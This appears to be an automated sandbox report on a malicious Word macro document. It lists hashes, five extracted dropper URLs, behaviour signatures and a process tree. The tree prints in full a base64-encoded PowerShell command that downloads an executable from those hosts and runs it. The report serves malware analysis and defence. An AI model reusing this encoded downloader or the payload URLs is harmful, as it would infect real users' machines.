Analysis

  • max time kernel
    107s
  • max time network
    44s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    20-05-2022 23:58

General

  • Target

    49ce522ee8d6aac5d7db702d398e0b6bdd01fab467a79a8c0723cfa3bafa73b8.doc

  • Size

    186KB

  • MD5

    9315ac7bb0fe11fc03a239ff8fd5059c

  • SHA1

    5bc51f211db6b6fb4cafd75567edfead8569b620

  • SHA256

    49ce522ee8d6aac5d7db702d398e0b6bdd01fab467a79a8c0723cfa3bafa73b8

  • SHA512

    149b32cf1f6b490ce083dfb66ad97f4a34c84522ad869cbaf9c8ca959c530bf4c2734c9a90cbbd11ed34064df015140d6985e6acc512f23c459ab8ac7d03cd69

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://vedax.store/cgi-bin/k21-9cbk34xfyh-83/

exe.dropper

https://revenuehotelconsultant.com/wp-includes/wwgmZV/

exe.dropper

https://ruby9mobile.com/icdx/yUAkhVvqx/

exe.dropper

http://psychologische-katzenberatung.de/wp-includes/aJxjHVH/

exe.dropper

http://www.kriti24.com/wp-content/GSMPonYO/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\49ce522ee8d6aac5d7db702d398e0b6bdd01fab467a79a8c0723cfa3bafa73b8.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1688
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1964
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABRAG0AdABlAHAAZgB6AHcAbwA9ACcASQBjAGgAawBuAHEAegBzACcAOwAkAEMAeQBhAHkAYQBrAHUAaABrAHEAcQBhACAAPQAgACcAMgA3ACcAOwAkAEwAaQBzAG4AeABrAHYAZwB1AHMAegBtAGgAPQAnAEsAaABkAHQAZwBqAGEAdgAnADsAJABSAHMAZgB3AGwAdABvAHMAeQBpAHYAbwB3AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABDAHkAYQB5AGEAawB1AGgAawBxAHEAYQArACcALgBlAHgAZQAnADsAJABOAHgAeAB6AHEAaQBvAGsAcwA9ACcATABiAGkAcABiAGkAZgBrAGkAcAAnADsAJABMAGYAawBsAHYAeABmAHoAYgA9ACYAKAAnAG4AZQAnACsAJwB3AC0AbwBiACcAKwAnAGoAZQAnACsAJwBjAHQAJwApACAAbgBlAFQALgB3AGUAQgBDAGwASQBlAE4AdAA7ACQATQBkAGkAZQBtAHkAYgB4AG4AeABzAGMAbAA9ACcAaAB0AHQAcAA6AC8ALwB2AGUAZABhAHgALgBzAHQAbwByAGUALwBjAGcAaQAtAGIAaQBuAC8AawAyADEALQA5AGMAYgBrADMANAB4AGYAeQBoAC0AOAAzAC8AKgBoAHQAdABwAHMAOgAvAC8AcgBlAHYAZQBuAHUAZQBoAG8AdABlAGwAYwBvAG4AcwB1AGwAdABhAG4AdAAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AdwB3AGcAbQBaAFYALwAqAGgAdAB0AHAAcwA6AC8ALwByAHUAYgB5ADkAbQBvAGIAaQBsAGUALgBjAG8AbQAvAGkAYwBkAHgALwB5AFUAQQBrAGgAVgB2AHEAeAAvACoAaAB0AHQAcAA6AC8ALwBwAHMAeQBjAGgAbwBsAG8AZwBpAHMAYwBoAGUALQBrAGEAdAB6AGUAbgBiAGUAcgBhAHQAdQBuAGcALgBkAGUALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBhAEoAeABqAEgAVgBIAC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AawByAGkAdABpADIANAAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAEcAUwBNAFAAbwBuAFkATwAvACcALgAiAHMAYABQAGwAaQBUACIAKAAnACoAJwApADsAJABMAGcAcwBwAGcAcABvAGsAbgBhAGYAPQAnAFkAZwBlAGsAbABiAHAAdQBxAHkAZgAnADsAZgBvAHIAZQBhAGMAaAAoACQAVwB1AGYAdABpAGYAdwBjAHQAeQB3AGwAaAAgAGkAbgAgACQATQBkAGkAZQBtAHkAYgB4AG4AeABzAGMAbAApAHsAdAByAHkAewAkAEwAZgBrAGwAdgB4AGYAegBiAC4AIgBEAG8AdwBOAGwAbwBhAGAARABgAEYAaQBgAEwARQAiACgAJABXAHUAZgB0AGkAZgB3AGMAdAB5AHcAbABoACwAIAAkAFIAcwBmAHcAbAB0AG8AcwB5AGkAdgBvAHcAKQA7ACQARQBhAHUAawBqAHMAbgBpAGwAPQAnAFQAaAB2AGUAcQB4AGwAdwB5AGIAYwBjAGIAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtACcAKwAnAEkAdAAnACsAJwBlAG0AJwApACAAJABSAHMAZgB3AGwAdABvAHMAeQBpAHYAbwB3ACkALgAiAGwARQBuAGcAYABUAGgAIgAgAC0AZwBlACAAMgAwADAANwA4ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAYABUAEEAUgBUACIAKAAkAFIAcwBmAHcAbAB0AG8AcwB5AGkAdgBvAHcAKQA7ACQASwB0AHUAaQBtAHQAYwBrAG4AcABjAD0AJwBXAGYAbQBuAGYAcgBlAGcAbABkACcAOwBiAHIAZQBhAGsAOwAkAEkAeABkAGMAeQB0AGsAbgBmAGQAPQAnAEsAbAB6AGUAbABxAGEAdgB1AGsAYgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABQAHYAaQBzAGgAegBwAGIAdgBlAHcAPQAnAFAAdwByAGQAaABzAHEAdgBjACcA
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1972

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1688-73-0x0000000000511000-0x0000000000532000-memory.dmp
      Filesize

      132KB

    • memory/1688-76-0x0000000000511000-0x0000000000532000-memory.dmp
      Filesize

      132KB

    • memory/1688-64-0x0000000000511000-0x0000000000532000-memory.dmp
      Filesize

      132KB

    • memory/1688-57-0x0000000076391000-0x0000000076393000-memory.dmp
      Filesize

      8KB

    • memory/1688-58-0x000000007166D000-0x0000000071678000-memory.dmp
      Filesize

      44KB

    • memory/1688-67-0x0000000000511000-0x0000000000532000-memory.dmp
      Filesize

      132KB

    • memory/1688-79-0x0000000000511000-0x0000000000532000-memory.dmp
      Filesize

      132KB

    • memory/1688-63-0x0000000000511000-0x0000000000532000-memory.dmp
      Filesize

      132KB

    • memory/1688-62-0x0000000000511000-0x0000000000532000-memory.dmp
      Filesize

      132KB

    • memory/1688-68-0x0000000000511000-0x0000000000532000-memory.dmp
      Filesize

      132KB

    • memory/1688-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1688-87-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1688-61-0x0000000000511000-0x0000000000532000-memory.dmp
      Filesize

      132KB

    • memory/1688-69-0x0000000000511000-0x0000000000532000-memory.dmp
      Filesize

      132KB

    • memory/1688-70-0x0000000000511000-0x0000000000532000-memory.dmp
      Filesize

      132KB

    • memory/1688-54-0x0000000072C01000-0x0000000072C04000-memory.dmp
      Filesize

      12KB

    • memory/1688-55-0x0000000070681000-0x0000000070683000-memory.dmp
      Filesize

      8KB

    • memory/1964-60-0x000007FEFC061000-0x000007FEFC063000-memory.dmp
      Filesize

      8KB

    • memory/1964-59-0x0000000000000000-mapping.dmp
    • memory/1972-83-0x000007FEF4600000-0x000007FEF5023000-memory.dmp
      Filesize

      10.1MB

    • memory/1972-84-0x000007FEEF230000-0x000007FEEFD8D000-memory.dmp
      Filesize

      11.4MB

    • memory/1972-85-0x0000000002864000-0x0000000002867000-memory.dmp
      Filesize

      12KB

    • memory/1972-86-0x000000000286B000-0x000000000288A000-memory.dmp
      Filesize

      124KB